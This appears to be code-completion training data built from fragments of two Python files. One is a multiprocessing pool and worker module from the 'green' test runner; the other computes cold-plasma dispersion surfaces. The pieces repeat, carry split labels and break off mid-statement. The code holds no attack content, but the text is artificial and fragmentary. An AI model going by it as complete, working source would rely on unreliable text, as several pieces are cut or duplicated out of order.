def apply_async(self, func, args=(), kwds={}, callback=None):
return Pool.apply_async(
self, ProcessLogger(func), args, kwds, callback)
# -------------------------------------------------------------------------
# START of Worker Finalization Monkey Patching
#
# I started with code from cpython/Lib/multiprocessing/pool.py from version
# 3.5.0a4+ of the main python mercurial repository. Then altered it to run
# on 2.7+ and added the finalizer/finalargs parameter handling.
_wrap_exception = True
def __init__(self, processes=None, initializer=None, initargs=(),
maxtasksperchild=None, context=None, finalizer=None,
finalargs=()):
|
def _repopulate_pool(self):
"""
Bring the number of pool processes up to the specified number, for use
after reaping workers which have exited.
"""
for i in range(self._processes - len(self._pool)):
w = self.Process(target=worker,
args=(self._inqueue, self._outqueue,
self._initializer,
self._initargs, self._maxtasksperchild,
self._wrap_exception,
self._finalizer,
self._finalargs)
)
self._pool.append(w)
w.name = w.name.replace('Process', 'PoolWorker')
w.daemon = True
w.start()
util.debug('added worker')
import platform
import multiprocessing.pool
from multiprocessing import util
try:
from multiprocessing.pool import MaybeEncodingError
except: # pragma: no cover
# Python 2.7.4 introduced this class. If we're on Python 2.7.0 to 2.7.3
# then we'll have to define it ourselves. :-/
class MaybeEncodingError(Exception):
"""Wraps possible unpickleable errors, so they can be
safely sent through the socket."""
def __init__(self, exc, value):
self.exc = repr(exc)
self.value = repr(value)
super(MaybeEncodingError, self).__init__(self.exc, self.value)
def __str__(self):
return "Error sending result: '%s'. Reason: '%s'" % (self.value,
self.exc)
def __repr__(self):
return "<MaybeEncodingError: %s>" % str(self)
# Python 2 and 3 raise a different error when they exit
if platform.python_version_tuple()[0] == '2': # pragma: no cover
PortableOSError = IOError
else: # pragma: no cover
PortableOSError = OSError
def worker(inqueue, outqueue, initializer=None, initargs=(), maxtasks=None,
wrap_exception=False, finalizer=None, finalargs=()): # pragma: no cover
assert maxtasks is None or (type(maxtasks) == int and maxtasks > 0)
put = outqueue.put
get = inqueue.get
if hasattr(inqueue, '_writer'):
inqueue._writer.close()
outqueue._reader.close()
if initializer is not None:
try:
initializer(*initargs)
except InitializerOrFinalizerError as e:
print(str(e))
completed = 0
while maxtasks is None or (maxtasks and completed < maxtasks):
try:
task = get()
except (EOFError, PortableOSError):
util.debug('worker got EOFError or OSError -- exiting')
break
if task is None:
util.debug('worker got sentinel -- exiting')
break
job, i, func, args, kwds = task
try:
result = (True, func(*args, **kwds))
except Exception as e:
if wrap_exception:
e = ExceptionWithTraceback(e, e.__traceback__)
result = (False, e)
try:
put((job, i, result))
except Exception as e:
wrapped = MaybeEncodingError(e, result[1])
util.debug("Possible encoding error while sending result: %s" % (
wrapped))
put((job, i, (False, wrapped)))
completed += 1
if finalizer:
try:
finalizer(*finalargs)
except InitializerOrFinalizerError as e:
print(str(e))
util.debug('worker exiting after %d tasks' % completed)
# Unmodified (see above)
class RemoteTraceback(Exception): # pragma: no cover
def __init__(self, tb):
self.tb = tb
def __str__(self):
return self.tb
# Unmodified (see above)
class ExceptionWithTraceback: # pragma: no cover
def __init__(self, exc, tb):
tb = traceback.format_exception(type(exc), exc, tb)
tb = ''.join(tb)
self.exc = exc
self.tb = '\n"""\n%s"""' % tb
def __reduce__(self):
return rebuild_exc, (self.exc, self.tb)
# Unmodified (see above)
def rebuild_exc(exc, tb): # pragma: no cover
exc.__cause__ = RemoteTraceback(tb)
return exc
multiprocessing.pool.worker = worker
# END of Worker Finalization Monkey Patching
# -----------------------------------------------------------------------------
def poolRunner(target, queue, coverage_number=None, omit_patterns=[]): # pragma: no cover
"""
I am the function that pool worker processes run. I run one unit test.
"""
# Each pool worker gets its own temp directory, to keep tests that are used
# to taking turns using the same temp file name from interfering with each
# other. So long as the test doesn't use a hard-coded temp directory, anyway.
saved_tempdir = tempfile.tempdir
tempfile.tempdir = tempfile.mkdtemp()
def cleanup():
# Restore the state of the temp directory
if sys.version_info[0] == 2: # pragma: no cover
shutil.rmtree(tempfile.tempdir, ignore_errors=True)
tempfile.tempdir = saved_tempdir
queue.put(None)
# Finish coverage
if coverage_number and coverage:
cov.stop()
cov.save()
# Each pool starts its own coverage, later combined by the main process.
if coverage_number and coverage:
cov = coverage.coverage(
data_file='.coverage.{}_{}'.format(
coverage_number, random.randint(0, 10000)),
omit=omit_patterns)
cov._warn_no_data = False
cov.start()
# What to do each time an individual test is started
already_sent = set()
def start_callback(test):
# Let the main process know what test we are starting
test = proto_test(test)
if test not in already_sent:
queue.put(test)
already_sent.add(test)
def finalize_callback(test_result):
# Let the main process know what happened with the test run
queue.put(test_result)
result = ProtoTestResult(start_callback, finalize_callback)
test = None
try:
test = loadTargets(target)
except:
err = sys.exc_info()
t = ProtoTest()
t.module = 'green.loader'
t.class_name = 'N/A'
t.description = 'Green encountered an error loading the unit test.'
t.method_name = 'poolRunner'
result.startTest(t)
result.addError(t, err)
result.stopTest(t)
queue.put(result)
cleanup()
return
if getattr(test, 'run', False):
# Loading was successful, let's do this
try:
test.run
|
self._finalizer = finalizer
self._finalargs = finalargs
super(LoggingDaemonlessPool, self).__init__(processes, initializer,
initargs, maxtasksperchild)
|
identifier_body
|
process.py
|
err = ''
sys.__stdout__.write("({}) {} {}".format(os.getpid(), msg, err)+'\n')
sys.__stdout__.flush()
class ProcessLogger(object):
"""
I am used by LoggingDaemonlessPool to get crash output out to the logger,
instead of having process crashes be silent
"""
def __init__(self, callable):
self.__callable = callable
def __call__(self, *args, **kwargs):
try:
result = self.__callable(*args, **kwargs)
except Exception:
# Here we add some debugging help. If multiprocessing's
# debugging is on, it will arrange to log the traceback
logger = multiprocessing.get_logger()
if not logger.handlers:
logger.addHandler(logging.StreamHandler())
logger.error(traceback.format_exc())
logger.handlers[0].flush()
# Re-raise the original exception so the Pool worker can
# clean up
raise
# It was fine, give a normal answer
return result
class DaemonlessProcess(multiprocessing.Process):
"""
I am used by LoggingDaemonlessPool to make pool workers NOT run in
daemon mode (daemon-mode processes can't launch their own subprocesses)
"""
def _get_daemon(self):
return False
def _set_daemon(self, value):
pass
# 'daemon' attribute needs to always return False
daemon = property(_get_daemon, _set_daemon)
class LoggingDaemonlessPool(Pool):
"""
I use ProcessLogger and DaemonlessProcess to make a pool of workers.
"""
Process = DaemonlessProcess
def apply_async(self, func, args=(), kwds={}, callback=None):
return Pool.apply_async(
self, ProcessLogger(func), args, kwds, callback)
# -------------------------------------------------------------------------
# START of Worker Finalization Monkey Patching
#
# I started with code from cpython/Lib/multiprocessing/pool.py from version
# 3.5.0a4+ of the main python mercurial repository. Then altered it to run
# on 2.7+ and added the finalizer/finalargs parameter handling.
_wrap_exception = True
def __init__(self, processes=None, initializer=None, initargs=(),
maxtasksperchild=None, context=None, finalizer=None,
finalargs=()):
self._finalizer = finalizer
self._finalargs = finalargs
super(LoggingDaemonlessPool, self).__init__(processes, initializer,
initargs, maxtasksperchild)
def _repopulate_pool(self):
"""
Bring the number of pool processes up to the specified number, for use
after reaping workers which have exited.
"""
for i in range(self._processes - len(self._pool)):
w = self.Process(target=worker,
args=(self._inqueue, self._outqueue,
self._initializer,
self._initargs, self._maxtasksperchild,
self._wrap_exception,
self._finalizer,
self._finalargs)
)
self._pool.append(w)
w.name = w.name.replace('Process', 'PoolWorker')
w.daemon = True
w.start()
util.debug('added worker')
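# A hypothetical usage sketch (not from this module): the finalizer/finalargs
# wired through by the monkey patching above run once in each worker right
# before it exits. All names below are illustrative only.
def _worker_cleanup(label):
    print('worker finished:', label)

def _finalizer_demo():
    pool = LoggingDaemonlessPool(processes=2,
                                 finalizer=_worker_cleanup,
                                 finalargs=('green-worker',))
    print(pool.apply_async(sum, ([1, 2, 3],)).get())  # prints 6
    pool.close()  # workers get the sentinel, run the finalizer, then exit
    pool.join()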
import platform
import multiprocessing.pool
from multiprocessing import util
try:
from multiprocessing.pool import MaybeEncodingError
except: # pragma: no cover
# Python 2.7.4 introduced this class. If we're on Python 2.7.0 to 2.7.3
# then we'll have to define it ourselves. :-/
class MaybeEncodingError(Exception):
"""Wraps possible unpickleable errors, so they can be
safely sent through the socket."""
def __init__(self, exc, value):
self.exc = repr(exc)
self.value = repr(value)
super(MaybeEncodingError, self).__init__(self.exc, self.value)
def __str__(self):
return "Error sending result: '%s'. Reason: '%s'" % (self.value,
self.exc)
def __repr__(self):
return "<MaybeEncodingError: %s>" % str(self)
# Python 2 and 3 raise a different error when they exit
if platform.python_version_tuple()[0] == '2': # pragma: no cover
PortableOSError = IOError
else: # pragma: no cover
PortableOSError = OSError
def worker(inqueue, outqueue, initializer=None, initargs=(), maxtasks=None,
wrap_exception=False, finalizer=None, finalargs=()): # pragma: no cover
assert maxtasks is None or (type(maxtasks) == int and maxtasks > 0)
put = outqueue.put
get = inqueue.get
if hasattr(inqueue, '_writer'):
inqueue._writer.close()
outqueue._reader.close()
if initializer is not None:
try:
initializer(*initargs)
except InitializerOrFinalizerError as e:
print(str(e))
completed = 0
while maxtasks is None or (maxtasks and completed < maxtasks):
try:
task = get()
except (EOFError, PortableOSError):
util.debug('worker got EOFError or OSError -- exiting')
break
if task is None:
util.debug('worker got sentinel -- exiting')
break
job, i, func, args, kwds = task
try:
result = (True, func(*args, **kwds))
except Exception as e:
if wrap_exception:
e = ExceptionWithTraceback(e, e.__traceback__)
result = (False, e)
try:
put((job, i, result))
except Exception as e:
wrapped = MaybeEncodingError(e, result[1])
util.debug("Possible encoding error while sending result: %s" % (
wrapped))
put((job, i, (False, wrapped)))
completed += 1
if finalizer:
try:
finalizer(*finalargs)
except InitializerOrFinalizerError as e:
print(str(e))
util.debug('worker exiting after %d tasks' % completed)
# Unmodified (see above)
class
|
(Exception): # pragma: no cover
def __init__(self, tb):
self.tb = tb
def __str__(self):
return self.tb
# Unmodified (see above)
class ExceptionWithTraceback: # pragma: no cover
def __init__(self, exc, tb):
tb = traceback.format_exception(type(exc), exc, tb)
tb = ''.join(tb)
self.exc = exc
self.tb = '\n"""\n%s"""' % tb
def __reduce__(self):
return rebuild_exc, (self.exc, self.tb)
# Unmodified (see above)
def rebuild_exc(exc, tb): # pragma: no cover
exc.__cause__ = RemoteTraceback(tb)
return exc
multiprocessing.pool.worker = worker
# END of Worker Finalization Monkey Patching
# -----------------------------------------------------------------------------
def poolRunner(target, queue, coverage_number=None, omit_patterns=[]): # pragma: no cover
"""
I am the function that pool worker processes run. I run one unit test.
"""
# Each pool worker gets its own temp directory, to keep tests that are used
# to taking turns using the same temp file name from interfering with each
# other. So long as the test doesn't use a hard-coded temp directory, anyway.
saved_tempdir = tempfile.tempdir
tempfile.tempdir = tempfile.mkdtemp()
def cleanup():
# Restore the state of the temp directory
if sys.version_info[0] == 2: # pragma: no cover
shutil.rmtree(tempfile.tempdir, ignore_errors=True)
tempfile.tempdir = saved_tempdir
queue.put(None)
# Finish coverage
if coverage_number and coverage:
cov.stop()
cov.save()
# Each pool starts its own coverage, later combined by the main process.
if coverage_number and coverage:
cov = coverage.coverage(
data_file='.coverage.{}_{}'.format(
coverage_number, random.randint(0, 10000)),
omit=omit_patterns)
cov._warn_no_data = False
cov.start()
# What to do each time an individual test is started
already_sent = set()
def start_callback(test):
# Let the main process know what test we are starting
test = proto_test(test)
if test not in already_sent:
queue.put(test)
already_sent.add(test)
def finalize_callback(test_result):
# Let the main process know what happened with the test run
queue.put(test_result)
result = ProtoTestResult(start_callback, finalize_callback)
test = None
try:
test = loadTargets(target)
except:
err = sys.exc_info()
t = ProtoTest()
t.module = 'green.loader'
t.class_name = 'N/A'
t.description = 'Green encountered an error loading the unit test.'
t.method_name = 'poolRunner'
result.startTest(t)
result.addError(t, err)
result.stopTest(t)
queue.put(result)
cleanup()
return
if getattr(test, 'run', False):
# Loading was successful, let's do this
try:
test.run
|
RemoteTraceback
|
identifier_name
|
process.py
|
err = ''
sys.__stdout__.write("({}) {} {}".format(os.getpid(), msg, err)+'\n')
sys.__stdout__.flush()
class ProcessLogger(object):
"""
I am used by LoggingDaemonlessPool to get crash output out to the logger,
instead of having process crashes be silent
"""
def __init__(self, callable):
self.__callable = callable
def __call__(self, *args, **kwargs):
try:
result = self.__callable(*args, **kwargs)
except Exception:
# Here we add some debugging help. If multiprocessing's
# debugging is on, it will arrange to log the traceback
logger = multiprocessing.get_logger()
if not logger.handlers:
logger.addHandler(logging.StreamHandler())
logger.error(traceback.format_exc())
logger.handlers[0].flush()
# Re-raise the original exception so the Pool worker can
# clean up
raise
# It was fine, give a normal answer
return result
class DaemonlessProcess(multiprocessing.Process):
"""
I am used by LoggingDaemonlessPool to make pool workers NOT run in
daemon mode (daemon-mode processes can't launch their own subprocesses)
"""
def _get_daemon(self):
return False
def _set_daemon(self, value):
pass
# 'daemon' attribute needs to always return False
daemon = property(_get_daemon, _set_daemon)
class LoggingDaemonlessPool(Pool):
"""
I use ProcessLogger and DaemonlessProcess to make a pool of workers.
"""
Process = DaemonlessProcess
def apply_async(self, func, args=(), kwds={}, callback=None):
return Pool.apply_async(
self, ProcessLogger(func), args, kwds, callback)
# -------------------------------------------------------------------------
# START of Worker Finalization Monkey Patching
#
# I started with code from cpython/Lib/multiprocessing/pool.py from version
# 3.5.0a4+ of the main python mercurial repository. Then altered it to run
# on 2.7+ and added the finalizer/finalargs parameter handling.
_wrap_exception = True
def __init__(self, processes=None, initializer=None, initargs=(),
maxtasksperchild=None, context=None, finalizer=None,
finalargs=()):
self._finalizer = finalizer
self._finalargs = finalargs
super(LoggingDaemonlessPool, self).__init__(processes, initializer,
initargs, maxtasksperchild)
def _repopulate_pool(self):
"""
Bring the number of pool processes up to the specified number, for use
after reaping workers which have exited.
"""
for i in range(self._processes - len(self._pool)):
w = self.Process(target=worker,
args=(self._inqueue, self._outqueue,
self._initializer,
self._initargs, self._maxtasksperchild,
self._wrap_exception,
self._finalizer,
self._finalargs)
)
self._pool.append(w)
w.name = w.name.replace('Process', 'PoolWorker')
w.daemon = True
w.start()
util.debug('added worker')
import platform
import multiprocessing.pool
from multiprocessing import util
try:
from multiprocessing.pool import MaybeEncodingError
except: # pragma: no cover
# Python 2.7.4 introduced this class. If we're on Python 2.7.0 to 2.7.3
# then we'll have to define it ourselves. :-/
class MaybeEncodingError(Exception):
"""Wraps possible unpickleable errors, so they can be
safely sent through the socket."""
def __init__(self, exc, value):
self.exc = repr(exc)
self.value = repr(value)
super(MaybeEncodingError, self).__init__(self.exc, self.value)
def __str__(self):
return "Error sending result: '%s'. Reason: '%s'" % (self.value,
self.exc)
def __repr__(self):
return "<MaybeEncodingError: %s>" % str(self)
# Python 2 and 3 raise a different error when they exit
if platform.python_version_tuple()[0] == '2': # pragma: no cover
PortableOSError = IOError
else: # pragma: no cover
PortableOSError = OSError
def worker(inqueue, outqueue, initializer=None, initargs=(), maxtasks=None,
wrap_exception=False, finalizer=None, finalargs=()): # pragma: no cover
assert maxtasks is None or (type(maxtasks) == int and maxtasks > 0)
put = outqueue.put
get = inqueue.get
if hasattr(inqueue, '_writer'):
inqueue._writer.close()
outqueue._reader.close()
if initializer is not None:
try:
initializer(*initargs)
except InitializerOrFinalizerError as e:
print(str(e))
completed = 0
while maxtasks is None or (maxtasks and completed < maxtasks):
try:
task = get()
except (EOFError, PortableOSError):
util.debug('worker got EOFError or OSError -- exiting')
break
if task is None:
util.debug('worker got sentinel -- exiting')
break
job, i, func, args, kwds = task
try:
result = (True, func(*args, **kwds))
except Exception as e:
if wrap_exception:
e = ExceptionWithTraceback(e, e.__traceback__)
result = (False, e)
try:
put((job, i, result))
except Exception as e:
wrapped = MaybeEncodingError(e, result[1])
util.debug("Possible encoding error while sending result: %s" % (
wrapped))
put((job, i, (False, wrapped)))
completed += 1
if finalizer:
try:
finalizer(*finalargs)
except InitializerOrFinalizerError as e:
print(str(e))
util.debug('worker exiting after %d tasks' % completed)
# Unmodified (see above)
class RemoteTraceback(Exception): # pragma: no cover
def __init__(self, tb):
self.tb = tb
def __str__(self):
return self.tb
# Unmodified (see above)
class ExceptionWithTraceback: # pragma: no cover
def __init__(self, exc, tb):
|
self.exc = exc
self.tb = '\n"""\n%s"""' % tb
def __reduce__(self):
return rebuild_exc, (self.exc, self.tb)
# Unmodified (see above)
def rebuild_exc(exc, tb): # pragma: no cover
exc.__cause__ = RemoteTraceback(tb)
return exc
multiprocessing.pool.worker = worker
# END of Worker Finalization Monkey Patching
# -----------------------------------------------------------------------------
def poolRunner(target, queue, coverage_number=None, omit_patterns=[]): # pragma: no cover
"""
I am the function that pool worker processes run. I run one unit test.
"""
# Each pool worker gets its own temp directory, to keep tests that are used
# to taking turns using the same temp file name from interfering with each
# other. So long as the test doesn't use a hard-coded temp directory, anyway.
saved_tempdir = tempfile.tempdir
tempfile.tempdir = tempfile.mkdtemp()
def cleanup():
# Restore the state of the temp directory
if sys.version_info[0] == 2: # pragma: no cover
shutil.rmtree(tempfile.tempdir, ignore_errors=True)
tempfile.tempdir = saved_tempdir
queue.put(None)
# Finish coverage
if coverage_number and coverage:
cov.stop()
cov.save()
# Each pool starts its own coverage, later combined by the main process.
if coverage_number and coverage:
cov = coverage.coverage(
data_file='.coverage.{}_{}'.format(
coverage_number, random.randint(0, 10000)),
omit=omit_patterns)
cov._warn_no_data = False
cov.start()
# What to do each time an individual test is started
already_sent = set()
def start_callback(test):
# Let the main process know what test we are starting
test = proto_test(test)
if test not in already_sent:
queue.put(test)
already_sent.add(test)
def finalize_callback(test_result):
# Let the main process know what happened with the test run
queue.put(test_result)
result = ProtoTestResult(start_callback, finalize_callback)
test = None
try:
test = loadTargets(target)
except:
err = sys.exc_info()
t = ProtoTest()
t.module = 'green.loader'
t.class_name = 'N/A'
t.description = 'Green encountered an error loading the unit test.'
t.method_name = 'poolRunner'
result.startTest(t)
result.addError(t, err)
result.stopTest(t)
queue.put(result)
cleanup()
return
if getattr(test, 'run', False):
# Loading was successful, let's do this
try:
test.run(result
|
tb = traceback.format_exception(type(exc), exc, tb)
tb = ''.join(tb)
|
random_line_split
|
process.py
|
# Re-raise the original exception so the Pool worker can
# clean up
raise
# It was fine, give a normal answer
return result
class DaemonlessProcess(multiprocessing.Process):
"""
I am used by LoggingDaemonlessPool to make pool workers NOT run in
daemon mode (daemon-mode processes can't launch their own subprocesses)
"""
def _get_daemon(self):
return False
def _set_daemon(self, value):
pass
# 'daemon' attribute needs to always return False
daemon = property(_get_daemon, _set_daemon)
class LoggingDaemonlessPool(Pool):
"""
I use ProcessLogger and DaemonlessProcess to make a pool of workers.
"""
Process = DaemonlessProcess
def apply_async(self, func, args=(), kwds={}, callback=None):
return Pool.apply_async(
self, ProcessLogger(func), args, kwds, callback)
# -------------------------------------------------------------------------
# START of Worker Finalization Monkey Patching
#
# I started with code from cpython/Lib/multiprocessing/pool.py from version
# 3.5.0a4+ of the main python mercurial repository. Then altered it to run
# on 2.7+ and added the finalizer/finalargs parameter handling.
_wrap_exception = True
def __init__(self, processes=None, initializer=None, initargs=(),
maxtasksperchild=None, context=None, finalizer=None,
finalargs=()):
self._finalizer = finalizer
self._finalargs = finalargs
super(LoggingDaemonlessPool, self).__init__(processes, initializer,
initargs, maxtasksperchild)
def _repopulate_pool(self):
"""
Bring the number of pool processes up to the specified number, for use
after reaping workers which have exited.
"""
for i in range(self._processes - len(self._pool)):
w = self.Process(target=worker,
args=(self._inqueue, self._outqueue,
self._initializer,
self._initargs, self._maxtasksperchild,
self._wrap_exception,
self._finalizer,
self._finalargs)
)
self._pool.append(w)
w.name = w.name.replace('Process', 'PoolWorker')
w.daemon = True
w.start()
util.debug('added worker')
import platform
import multiprocessing.pool
from multiprocessing import util
try:
from multiprocessing.pool import MaybeEncodingError
except: # pragma: no cover
# Python 2.7.4 introduced this class. If we're on Python 2.7.0 to 2.7.3
# then we'll have to define it ourselves. :-/
class MaybeEncodingError(Exception):
"""Wraps possible unpickleable errors, so they can be
safely sent through the socket."""
def __init__(self, exc, value):
self.exc = repr(exc)
self.value = repr(value)
super(MaybeEncodingError, self).__init__(self.exc, self.value)
def __str__(self):
return "Error sending result: '%s'. Reason: '%s'" % (self.value,
self.exc)
def __repr__(self):
return "<MaybeEncodingError: %s>" % str(self)
# Python 2 and 3 raise a different error when they exit
if platform.python_version_tuple()[0] == '2': # pragma: no cover
PortableOSError = IOError
else: # pragma: no cover
PortableOSError = OSError
def worker(inqueue, outqueue, initializer=None, initargs=(), maxtasks=None,
wrap_exception=False, finalizer=None, finalargs=()): # pragma: no cover
assert maxtasks is None or (type(maxtasks) == int and maxtasks > 0)
put = outqueue.put
get = inqueue.get
if hasattr(inqueue, '_writer'):
inqueue._writer.close()
outqueue._reader.close()
if initializer is not None:
try:
initializer(*initargs)
except InitializerOrFinalizerError as e:
print(str(e))
completed = 0
while maxtasks is None or (maxtasks and completed < maxtasks):
try:
task = get()
except (EOFError, PortableOSError):
util.debug('worker got EOFError or OSError -- exiting')
break
if task is None:
util.debug('worker got sentinel -- exiting')
break
job, i, func, args, kwds = task
try:
result = (True, func(*args, **kwds))
except Exception as e:
if wrap_exception:
e = ExceptionWithTraceback(e, e.__traceback__)
result = (False, e)
try:
put((job, i, result))
except Exception as e:
wrapped = MaybeEncodingError(e, result[1])
util.debug("Possible encoding error while sending result: %s" % (
wrapped))
put((job, i, (False, wrapped)))
completed += 1
if finalizer:
try:
finalizer(*finalargs)
except InitializerOrFinalizerError as e:
print(str(e))
util.debug('worker exiting after %d tasks' % completed)
# Unmodified (see above)
class RemoteTraceback(Exception): # pragma: no cover
def __init__(self, tb):
self.tb = tb
def __str__(self):
return self.tb
# Unmodified (see above)
class ExceptionWithTraceback: # pragma: no cover
def __init__(self, exc, tb):
tb = traceback.format_exception(type(exc), exc, tb)
tb = ''.join(tb)
self.exc = exc
self.tb = '\n"""\n%s"""' % tb
def __reduce__(self):
return rebuild_exc, (self.exc, self.tb)
# Unmodified (see above)
def rebuild_exc(exc, tb): # pragma: no cover
exc.__cause__ = RemoteTraceback(tb)
return exc
multiprocessing.pool.worker = worker
# END of Worker Finalization Monkey Patching
# -----------------------------------------------------------------------------
def poolRunner(target, queue, coverage_number=None, omit_patterns=[]): # pragma: no cover
"""
I am the function that pool worker processes run. I run one unit test.
"""
# Each pool worker gets its own temp directory, to keep tests that are used
# to taking turns using the same temp file name from interfering with each
# other. So long as the test doesn't use a hard-coded temp directory, anyway.
saved_tempdir = tempfile.tempdir
tempfile.tempdir = tempfile.mkdtemp()
def cleanup():
# Restore the state of the temp directory
if sys.version_info[0] == 2: # pragma: no cover
shutil.rmtree(tempfile.tempdir, ignore_errors=True)
tempfile.tempdir = saved_tempdir
queue.put(None)
# Finish coverage
if coverage_number and coverage:
cov.stop()
cov.save()
# Each pool starts its own coverage, later combined by the main process.
if coverage_number and coverage:
cov = coverage.coverage(
data_file='.coverage.{}_{}'.format(
coverage_number, random.randint(0, 10000)),
omit=omit_patterns)
cov._warn_no_data = False
cov.start()
# What to do each time an individual test is started
already_sent = set()
def start_callback(test):
# Let the main process know what test we are starting
test = proto_test(test)
if test not in already_sent:
queue.put(test)
already_sent.add(test)
def finalize_callback(test_result):
# Let the main process know what happened with the test run
queue.put(test_result)
result = ProtoTestResult(start_callback, finalize_callback)
test = None
try:
test = loadTargets(target)
except:
err = sys.exc_info()
t = ProtoTest()
t.module = 'green.loader'
t.class_name = 'N/A'
t.description = 'Green encountered an error loading the unit test.'
t.method_name = 'poolRunner'
result.startTest(t)
result.addError(t, err)
result.stopTest(t)
queue.put(result)
cleanup()
return
if getattr(test, 'run', False):
# Loading was successful, let's do this
|
try:
test.run(result)
# If your class setUpClass(self) method crashes, the test doesn't
# raise an exception, but it does add an entry to errors. Some
# other things add entries to errors as well, but they all call the
# finalize callback.
if result and (not result.finalize_callback_called) and getattr(result, 'errors', False):
queue.put(test)
queue.put(result)
except:
# Some frameworks like testtools record the error AND THEN let it
# through to crash things. So we only need to manufacture another
# error if the underlying framework didn't, but either way we don't
# want to crash.
if result.errors:
queue.put(result)
else:
err = sys.exc_info()
result.startTest(test)
result.addError(test, err)
|
conditional_block
|
|
disp_surf_calc.py
|
np.conj(e_x) + e_y * np.conj(e_y))
e_tot = np.sqrt(e_x * np.conj(e_x) + e_y * np.conj(e_y) + e_z ** 2)
e_pol = -2 * np.imag(e_x * np.conj(e_y)) / e_per ** 2
return e_x, e_y, e_z, e_per, e_tot, e_pol
def _calc_b(kc_x_mat, kc_z_mat, w_final, e_x, e_y, e_z):
b_x = -kc_z_mat * e_y / w_final
b_y = (kc_z_mat * e_x - kc_x_mat * e_z) / w_final
b_z = kc_x_mat * e_y / w_final
b_par = np.sqrt(b_z * np.conj(b_z))
b_per = np.sqrt(b_x * np.conj(b_x) + b_y * np.conj(b_y))
b_pol = -2 * np.imag(b_x * np.conj(b_y)) / b_per ** 2
b_tot = np.sqrt(
b_x * np.conj(b_x) + b_y * np.conj(b_y) + b_z * np.conj(b_z))
return b_x, b_y, b_z, b_par, b_per, b_pol, b_tot
def _calc_s(e_x, e_y, e_z, b_x, b_y, b_z):
# Poynting flux
s_x = e_y * np.conj(b_z) - e_z * np.conj(b_y)
s_y = e_z * np.conj(b_x) - e_x * np.conj(b_z)
s_z = e_x * np.conj(b_y) - e_y * np.conj(b_x)
s_par = np.abs(s_z)
s_tot = np.sqrt(s_x * np.conj(s_x) + s_y * np.conj(s_y)
+ s_z * np.conj(s_z))
return s_par, s_tot
def _calc_part2fields(wp_e, en_e, en_i, e_tot, b_tot):
n_e = wp_e ** 2
en_e_n = en_e * n_e
en_i_n = en_i * n_e
en_efield = 0.5 * e_tot ** 2
en_bfield = 0.5 * b_tot ** 2
ratio_part_field = (en_e_n + en_i_n) / (en_efield + en_bfield)
return ratio_part_field
def
|
(kc_x_mat, kc_z_mat, w_final, v_ex, v_ez, v_ix, v_iz):
dn_e_n = (kc_x_mat * v_ex + kc_z_mat * v_ez) / w_final
dn_e_n = np.sqrt(dn_e_n * np.conj(dn_e_n))
dn_i_n = (kc_x_mat * v_ix + kc_z_mat * v_iz) / w_final
dn_i_n = np.sqrt(dn_i_n * np.conj(dn_i_n))
dne_dni = dn_e_n / dn_i_n
return dn_e_n, dn_i_n, dne_dni
def _calc_vei(m_i, wc_i, w_final, e_x, e_y, e_z):
q_e, q_i, m_e, wc_e = [-1, 1, 1, 1]
v_ex = 1j * q_e * (w_final * e_x - 1j * wc_e * e_y)
v_ex /= m_e * (w_final ** 2 - wc_e ** 2)
v_ey = 1j * q_e * (1j * wc_e * e_x + w_final * e_y)
v_ey /= m_e * (w_final ** 2 - wc_e ** 2)
v_ez = 1j * q_e * e_z / (m_e * w_final)
v_ix = 1j * q_i * (w_final * e_x + 1j * wc_i * e_y)
v_ix /= m_i * (w_final ** 2 - wc_i ** 2)
v_iy = 1j * q_i * (-1j * wc_i * e_x + w_final * e_y)
v_iy /= m_i * (w_final ** 2 - wc_i ** 2)
v_iz = 1j * q_i * e_z / (m_i * w_final)
return v_ex, v_ey, v_ez, v_ix, v_iy, v_iz
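# Hypothetical usage sketch for disp_surf_calc (documented below); the argument
# values and the plotting code are illustrative, and matplotlib is assumed to be
# available alongside numpy.
def _plot_lowest_surface():
    import matplotlib.pyplot as plt
    kx_, kz_, wf_, extra = disp_surf_calc(kc_x_max=20, kc_z_max=20,
                                          m_i=1836, wp_e=5)
    plt.pcolormesh(kx_, kz_, wf_[0], shading='auto')  # lowest of the ten surfaces
    plt.xlabel(r'$k_\perp c/\omega_{ce}$')
    plt.ylabel(r'$k_\parallel c/\omega_{ce}$')
    plt.colorbar(label=r'$\omega/\omega_{ce}$')
    plt.show()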
def disp_surf_calc(kc_x_max, kc_z_max, m_i, wp_e):
r"""Calculate the cold plasma dispersion surfaces according to equation
2.64 in Plasma Waves by Swanson (2nd ed.)
Parameters
----------
kc_x_max : float
Max value of k_perpendicular*c/w_c.
kc_z_max : float
Max value of k_parallel*c/w_c.
m_i : float
Ion mass in terms of electron masses.
wp_e : float
Electron plasma frequency in terms of electron gyro frequency.
Returns
-------
kx_ : ndarray
k_perpendicular*c/w_c meshgrid
kz_ : ndarray
k_parallel*c/w_c meshgrid
wf_ : ndarray
Dispersion surfaces.
extra_param : dict
Extra parameters to plot.
"""
# Make vectors of the wave numbers
kc_z = np.linspace(1e-6, kc_z_max, 35)
kc_x = np.linspace(1e-6, kc_x_max, 35)
# Turn those vectors into matrices
kc_x_mat, kc_z_mat = np.meshgrid(kc_x, kc_z)
# Find some of the numbers that appear later in the calculations
kc_ = np.sqrt(kc_x_mat ** 2 + kc_z_mat ** 2) # Absolute value of k
theta_ = np.arctan2(kc_x_mat, kc_z_mat) # The angle between k and B
wc_i = 1 / m_i # The ion gyro frequency
wp_i = wp_e / np.sqrt(m_i) # The ion plasma frequency
wp_ = np.sqrt(wp_e ** 2 + wp_i ** 2) # The total plasma frequency
# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
# For every k_perp and k_par, turn the dispersion relation into a
# polynomial equation and solve it.
# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
# The polynomial coefficients are calculated
pol_koeff_8 = -2 * kc_ ** 2
pol_koeff_8 -= (1 + wc_i ** 2 + 3 * wp_ ** 2) * np.ones(kc_.shape)
pol_koeff_6 = (2 * kc_ ** 2 + wp_ ** 2) * (1 + wc_i ** 2 + 2 * wp_ ** 2)
pol_koeff_6 += kc_ ** 4 + (wp_ ** 2 + wc_i) ** 2
pol_koeff_4 = -kc_ ** 4 * (1 + wc_i ** 2 + wp_ ** 2)
pol_koeff_4 -= 2 * kc_ ** 2 * (wp_ ** 2 + wc_i) ** 2
pol_koeff_4 -= (kc_ * wp_) ** 2 * (1 + wc_i ** 2 - wc_i) * (
1 + np.cos(theta_) ** 2)
pol_koeff_4 -= wp_ ** 2 * (wp_ ** 2 + wc_i) ** 2
